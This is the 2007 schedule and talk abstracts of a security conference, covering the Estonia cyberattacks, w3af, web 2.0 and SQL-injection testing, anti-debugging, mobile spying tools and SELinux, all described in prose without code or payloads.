Schedule for 2007

Thursday Oct 11, 2007
08:30 Registration and Morning Coffee
09:00 Opening Words, Tomi Tuominen
09:15 Keynote: eSStonia
Hillar Aarelaid
CERT-EE
10:15 Coffee
10:30 Keynote: eSStonia
Hillar Aarelaid
CERT-EE
11:30 Lunch
12:30 w3af - A framework to own the Web
Andres Riancho
Cybsec
Mobile phone spying tools and how to protect against them
Jarno Niemelä
F-Secure Oyj
13:30 Break
13:45 w3af - A framework to own the Web
Andres Riancho
Cybsec
An introduction to legacy mobile data networks
olleB
Toolcrypt Group
14:45 Coffee
15:00 Windows Vista - 12 askelta parempaan tietoturvallisuuteen
Kimmo Rousku
An introduction to legacy mobile data networks
olleB
Toolcrypt Group
16:00 Closing Words for the 1st day, Tomi Tuominen
16:15 Cocktails & Networking
19:00 Cocktails & Networking ends

Friday Oct 12, 2007
08:30 Morning Coffee
09:00 Opening Words, Tomi Tuominen
09:15 Hacking the web 2.0
Thomas Olofsson
SELinux; an Introduction to MAC and DTe
Robert E. Lee
Outpost24
10:15 Coffee
10:30 Hacking the web 2.0
Thomas Olofsson
SELinux; an Introduction to MAC and DTe
Robert E. Lee
Outpost24
11:30 Lunch
12:30 School of hard knocks - things you can learn and the laughs you can have when working with MSRC
Mark Debenham
Microsoft UK
Solving the T2'07 Challenge
Kamil Leoniak
F-Secure Oyj
13:30 Break
13:45 SQL-injection and Out-of-Band channeling
Patrik Karlsson
Cqure.net
Anti-debug methods and how to bypass them
Toni Koivunen
CERT-FI
14:45 Coffee
15:00 SQL-injection and Out-of-Band channeling
Patrik Karlsson
Cqure.net
CVSS and CVE-resolver concept
Juhani Eronen, Sauli Pahlman
CERT-FI
16:00 Closing Words, Tomi Tuominen
16:00 Conference Ends

Keynote: eSStonia

Hillar Aarelaid @ CERT-EE


During April and May of this year, massive online attacks were launched against Estonia. Although Estonia was able to respond to these incidents and prevent critical damage, the attacks represent an escalation to the use of the Internet in warfare.

In these attacks critical infrastructure proved to be the private and business sector, rather than what is usually considered the top risk (such as transportation and energy systems). ISPs, banks and media web sites became critical, and had to be protected.

This talk will summarize and analyze the attacks and defense in the incident from April-May of this year, but also provide some in depths of those events.

Hillar Aarelaid is the manager of CERT-EE. He has also served as Chief Information Security Officer in Estonian Police and as a Director General in Data Protection Inspectorate.


w3af - A framework to own the Web

Andres Riancho @ Cybsec


Web application auditing and exploiting is an art, but even art needs help of tools to make the process faster and more accurate. Right now open source tools like nikto, wapiti, pantera and others try to find vulnerabilities in web applications but lack many features and configuration options. Comercial tools have the features, at the expense of high product costs, and aren't as dynamic as open source projects.

w3af ( Web Application Attack and Audit Framework ) is an open source project that aims to automate the detection and explotation of all web application vulnerabilities. The project objective is to become an open platform where anyone can contribute with code and new technics. w3af is extended using plugins that are fully written in python, right now the project has more than 85 plugins and 35K lines of code!

The framework is divided into three phases: discovery, audit and attack. All plugins smoothly communicate with each other and _work together_ to achieve the objective; w3af replaces standalone tools and makes web penetration testing as easy as possible; any wierd characteristic can be added as a plugin and consume all the features of the framework.

w3af implements many exploit plugins and features to aid this process, not less important are the discovery and audit plugins that will find those vulnerabilities for you to exploit! w3af, one tool to rule them all.

The outline of the presentation will be following:

* The current state of web application tools * w3af architechture overview * Extending the functionality with plugins * w3afAgent * Web 2.0 * Lots of demos * Conclusions

Andres Riancho has been working as a security consultant for Cybsec for the last two years, focused on Penetration Testing and Vulnerability Research. During his research phase he has found critical vulnerabilities in 3com TippingPoint and ISS appliances and also contributed in SAP vulnerability research done at Cybsec. His main focus is in web application auditing and exploiting, so he developed w3af, web application attack and audit framework; a very complete framework for auditing and exploiting web applications.


Windows Vista - 12 askelta parempaan tietoturvallisuuteen

Kimmo Rousku


Esityksessä käydään läpi Windows Vistan työasematason tietoturvallisuuteen liittyvät keskeiset ominaisuudet sekä annetaan käyttövinkkejä AD:n hyödyntämiseen tietoturvan parantamiseksi.

Kimmo Rousku on toiminut vapaana IT-kouluttajana ja tietokirjailijana vuodesta 1985 saakka. Hän on kirjoittanut satoja lehtiartikkeleita sekä toistakymmentä IT-alaa käsittelevää kirjaa, joista tuorein on Docendon kustantama "Windows Vista - tehoa työskentelyyn". Hänen koulutus- ja luentotilaisuuksiin on vuosien varrella osallistunut yli 12 000 henkeä. Päätoimisesti hän toimii Stakesin tietohallinto- ja tietoturvapäällikkönä.


Mobile phone spying tools and how to protect against them

Jarno Niemelä @ F-Secure Oyj


Mobile phone spying tools a are tools that are used to spy on persons private information and usage of the phone. Spying tools range from simple SMS forwarding tools to tools that can reveal all private information that the phone has, be it phone book, SMS and MMS messages, call history or current physical location.

This talk will give more information about currently available mobile spying tools and threats they represent. The talk will cover currently available tools, what they are capable of and how to detect that phone is being spied on.

The authors of mobile spying tools claim that such tools should be used only for legal purposes, such as monitoring your children or track stolen phones. However with the capabilities provided by such tools they can just as easily used for stalking or corporate espionage.

Jarno Niemelä joined F-Secure Corporation in year 2000 as Mobile Anti-Virus researcher and currently serves as Senior Anti-Virus researcher in the same company. He has followed the mobile malware and security field for over six years and has seen the development of the threats from the first Palm OS trojan to current Symbian malware.


An introduction to legacy mobile data networks

olleB @ Toolcrypt Group


The talk will present a brief history of mobile data networks and an overview of the commercial packet data networks are in operation today. It will focus on "legacy" networks built with standards developed in the 70's and 80's and show some of the fun things you can find whizzing about these older networks where "security" only meant "availability" and access controls were mostly an afterthought.

Two specific examples of insufficient security for a protocol using shared medium will be made, as the security mechanisms of the NMT and Mobitex protocols are revealed. Finally we will be touching on the technologies that these older systems eventually will be replaced by and present some highly unscientific estimates of how quickly they will die out.

OlleB is a suprisingly shy extrovert who, by day, works on bringing the IT-security solutions of tomorrow to the systems of today. In his spare time, what precious little there is, he engages in exploratory deconstruction of technology and alcohol-induced amnesia.


Hacking the web 2.0

Thomas Olofsson


The web is changing rapidly. New technologies are emerging. The once static posting of web forms are a thing of the past. Today modern web applications are interacting with the users via flash movies, self modifying search boxes and forms that are generated on the fly by client side javascripts.

This presentation covers the basics of the modern web 2.0 frameworks including GWT. The focus is on the potential security problems within these type of applications. But also showing how to penetration test and audit these type of applications. So how do you test a web application that doesn't contain a single line of HTML?

Few tools and techniques are shown to successfully test these ajax based applications.

The outline of the presentation will be following:

* Enumerating web services * Enumerating ajax applications * Hacking XMLRPC * Fuzzing xmlhttp requests * Fuzzing client side javascripts

Thomas Olofsson is security professional who has been working with IT-security and penetration testing since 1997. He has been focusing on application security and have been testing the application security of many large corporations and banks over the years. Thomas has a lot of experience in application development.


School of hard knocks - things you can learn and the laughs you can have when working with MSRC

Mark Debenham @ Microsoft UK


Just what really goes on in the little portion of Microsoft which deals with reported security vulnerabilities? What kind of things are encountered and how are lessons learnt when bugs are found? This talk will discuss bugs which have been found and fixed in both Windows and other Microsoft products and services as well as what lessons have been learnt.

Mark Debenham Security Software Engineer at Microsoft, works with a team of security researchers who investigate vulnerabilities and security threats as part of the Microsoft Security Response Center (MSRC).

The SWI React team works on every MSRC case to help improve the guidance and protection provided to customers through our security updates and bulletins by discovering additional attack vectors, new exploitation techniques and adapting methods and techniques quickly to stay ahead of the ever evolving security ecosystem.

The team also provides forward looking security guidance to product teams within Microsoft, impacting products and services before and after release.


SQL-injection and Out-of-Band channeling

Patrik Karlsson @ Cqure.net


Did you know a hacker could steal your corporate secrets by channeling them over DNS?

A large number of web applications are still found suffering from improper input validation controls. This is a fact commonly exploited by hackers in order to gain unauthorized access to backend databases and to steal sensitive corporate information. As systems are hardened hackers are often forced to rely on blind SQL injection in order to extract information.

The audience will be introduced to the traditional methods of extracting information using SQL injection. Demonstrations will show how an attacker has to adapt his methods once applications and systems are hardened. The talk will cover:

* extracting information through application error messages * extracting information by reshaping queries * extracting information by blind SQL-injection

The presentation will then introduce the concept of out-of-band channeling which is an alternative technique that under certain circumstances may be much more efficient. A number of different out-of-band channels with their respective pros & cons will be presented. The focus will be on extracting information using DNS as the out-of-band channel. At the end a number of preventive measures will be discussed.

Patrik Karlsson is the founder of the security related website cqure.net, where he publishes some of his security related work. He has published security advisories outlining vulnerabilities in products from vendors such as Citrix, Novell and IBM and frequently releases security related tools used by security professionals all over the globe. His work has been mentioned in a number of articles and books and used for education and security testing. For the last couple of years he has specialised in web application security and databases. He is currently a partner at Inspect it, a Swedish based information security consultancy.


SELinux; an Introduction to MAC and DTe

Robert E. Lee @ Outpost24


To quote a now (in)famous security researcher "0-day can happen to anyone". While to a certain degree this may be true, SELinux with a well thought out policy can greatly limit the impact of an attack.

This talk will contrast high level differences between Discretionary and Mandatory Access Control. It will also introduce the concepts of Domain and Type Enforcement (specifically SELinux's TE implementation). It will conclude with a demonstration of Type Enforcement protecting a system from an application/user-land attack.

Robert E. Lee is the Chief Security Officer for Outpost24, a Vulnerability Management service provider. Robert came to Outpost24 after they acquired Dyad Security. As the founder of Dyad Security, Robert performed manual security tests, taught ISECOM's OPST and OPSA certification courses, and contributed ideas to security tool projects such as Unicornscan. Robert also serves on the Board for ISECOM and has contributed to the OSSTMM. Robert has been working with UNIX, networks, and security since 1992.


Solving the T2'07 Challenge

Kamil Leoniak @ F-Secure Oyj


The presentation will go through the T2'07 Challenge and explain its inner workings. The outline of the presentation will be following:

* General overview * Architechture overview * Anti-debugging techniques * Pseudo-C language, challenge source * One way of solving the challenge

Kamil Leoniak joined F-Secure Corporation in year 2006 as Anti-Virus Researcher. He is mainly interested in reverse engineering packers and complex protection schemes.


Anti-debug methods and how to bypass them

Toni Koivunen @ CERT-FI


An increasing number of malicious programs utilize various methods to detect debuggers and monitoring programs as well as anti-analysis methods to burden the task of a malware analyst. This presentation will go through some of the methods, describing what they do as well as how to bypass them.

Participants will also be given a small program that might help detect some of these methods.

Toni Koivunen is an Information Security Analyst at CERT-FI, where his responsibilities include malware analysis and exploitation methods. Off-duty he also manages the teamfurry.com domain which focuses on various malware and reverse engineering issues.


CVSS and CVE-resolver concept

Juhani Eronen, Sauli Pahlman @ CERT-FI


Currently, many information security related problems are tracked on a very manual and time-consuming manner. There are several automation projects at CERT-FI aimed at decreasing manual labor, which in turn frees resources and raises staff motivation. The CVE-Resolver is a tool and an underlying concept for automated vulnerability tracking.

The resolver gathers data in (semi)formally defined formats from various repositories. The presentation includes a concise introduction to CVSS and other common vulnerability taxonomies and metrics. Basic information on the vulnerability such as the release date, vulnerable systems, external references, and related vulnerabilies will be recorded.

The gathered information works as an up-to-date vulnerability encyclopedia as well as a basis for statistics and visualisation. The data is periodically updated, and change notifications are sent on tracked issues. The data is saved to a wiki in a format that enables automated processing while facilitating expert analysis and collabotion.

Juhani Eronen is an Information Security Analyst at CERT-FI, where his responsibilities include vulnerability co-ordination, automation of the handling of security incidents and information assurance. Formerly, he worked for OUSPG researching protocol vulnerabilities and dependencies of the critical information infrastructure, among other things.

Sauli Pahlman is an Information Security Analyst at CERT-FI, where his responsibilites include incident response, security automation, system administration. Formerly, he has worked for TeliaSonera R&D researching mobile communication techniques and services. He holds an M. Sc. in Electrical Engineering from the Helsinki University of Technology.